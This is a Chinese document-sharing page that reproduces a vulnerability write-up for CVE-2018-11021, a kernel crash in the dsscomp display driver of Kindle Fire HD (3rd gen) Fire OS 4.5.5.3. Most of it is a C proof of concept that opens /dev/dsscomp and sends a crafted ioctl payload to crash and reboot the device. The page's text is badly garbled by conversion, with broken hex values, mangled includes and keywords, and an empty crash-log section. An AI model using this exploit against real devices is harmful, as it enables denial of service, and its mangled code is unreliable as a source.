《(CVE-2018-11021)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11021)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(3页珍藏版)》请在第壹文秘上搜索。
1、(CVE-2018-11021) Amazon Kindle Fire HD (3rd) Fire OS kernel 组件安全漏洞一、漏洞简介Amazon Kindle Fire HD (3rd) Fire OS 4.5.5.3 内核组件中的内核模块 omapdriversvideoomap2dsscompdevice.c 允许攻击者通过设备/ dev 上 ioctl 的参数注入特制参数/dsscomp与命令1118064517并导致内核崩溃。要探索此漏洞,必须打开设备文件/ dev/dsscomp,并使用命令Ill8064517和 精心设计的有效负载作为第三个参数在此设备文件上调用ioct
2、l系统调用。二、漏洞影响Fire OS 4.5.5.3三、复现过程poc /* This is poc of Kindle Fire HD 3rd* A bug in the ioctl interface of device file devdsscomp causes the system crash via IOCTL 1118064517.* Related buggy struct name is dsscomp_setup_dispc_data.* This Poc should run with permission to do ioctl on devdsscomp.*/#in
3、clude #include ttinclude #include const static char *driver = ,devdsscomp;static command = 1118064517;int main(int argc, char *argv, char *env) unsigned int payload = 0xffffffff, 0X00000003j 05d200040, 079900008j 0x8f5928bd, 0x78b02422j 0X000000004 Oxffffffff, 0f4c50400,0x007fffff, 0x8499f562, 0ffff
4、0400, 0001bl31dj 060818210, 0x00000007, 0ffffffff, 0x00000000, 0x9da9041c 0xcd980400, 0x001f03f4, 0X00000007, 0x2a34003f, 0x7c80d8f3j 0x63102627, 0c73643a8, 0xa28f0665, 0X00000000, 0x689e57b4, 0x01ff0008, 0x5e7324bl, 0ae3b003f, 00bl74d86, 0x00000400, 0x2:Iffff37, 0ceb367a4j 0X00000040, 0X00000001, 0
5、xec000f9e, 0x00000001j 0000001ff, 0X00000000, 000000000, 0X0000000f, 0x0425c069, 0038cc3bej 00000000f, 000000080, 0e5790100, 0x5blbffffj 0x0000d355, 0x0000c685, 0xa0070000, 00010ffff, 000a0ff00, 0X00000001j 0ff490700, 00832ad03j 000000006, 000000002, 0X00000001 081f871c0, 0738019cb, 0bf47ffff, 0X000
6、00040j 0X00000001, 0x7fl90f33, 0X00000001, 0x8295769b, 0x0000003fj 0x869f2295, Oxffffffff, 0xd673914f, 0x05055800, 0xed69b7d5, 000000000j 00107ebbdj 0xd214af8d, 0xffff4a93j 0x26450008, 0x58df0000, 0dl6db084, 003ff30ddj 0x00000001, 0x209aff3b, 0xe7850800, 0X00000002, 0x30da815cj 0x426f5105, 0x0del09d
7、7, 02cla65fcj 0xfcb3d75f, 0X00000000, 000000001, 08066be5b, 0X00000002, 0ffffffff, 0x5cf232ec, 0680dl469j 0X00000001j 0X00000020, 0xffffffff, 0X00000400, 0xdldl2be8j 0X02010200, 0x01ffcl6f, 0xf6e237e6j 0x007f0000j 0x0Iff08f8, 0000f00f9, 0bad07695, 0x00000000, 0xbaff0000, 0x24040040j 0x00000006j 0X00
8、000004, 0x00000000, 0bc2e9242j 0009f5f08, 0X00800000, 0X00000000, 0x00000001, 0xff8800ff, 0X00000001, 000000000j 0X000003f4, 0x6faa8472j 0x00000400, 0xec857dd5, 0x00000000j 0X00000040, 0ffffffff, 03f004874, 0x0000b77a, 0ec9acb95j 0facc0001j 0xffff0001j 00080ffffj 0x3600ff03, 0X00000001, 08fff7d7f, 0
9、6b87075a, 0x00000000, 0x41414141j 041414141j 0x41414141j 0x41414141, 0X00100Iff, 000000000j 0X00000001, 0xfflf0512j 0x00000001, 0x51e32167, 0xcl8c55ccj 0x00000000, Oxffffffff, 0xb4aafl2b 86edfdbdj 0x00000010, 0x0000003f,0xabff7b00j0xffff9ea3j0b28e0040,0000fffff,0x458603f4,0ffff007f,0a9030f02j0000000
10、01j0x002Cffff,0x9e00cdffj0x00000004j0x41414141,0x41414141,041414141,0x41414141 ;int fd = 0;fd = OPen(driver, 0_RDWR);if (fd datalocaltmplog);return -1;printf(Try open %s with command 0x%.n, driver, command);printf(System will crash and reboot.n);if(ioctl(fd, command, payload) datalocaltmplog);return -1;close(fd);return 0;)崩溃日志To be added here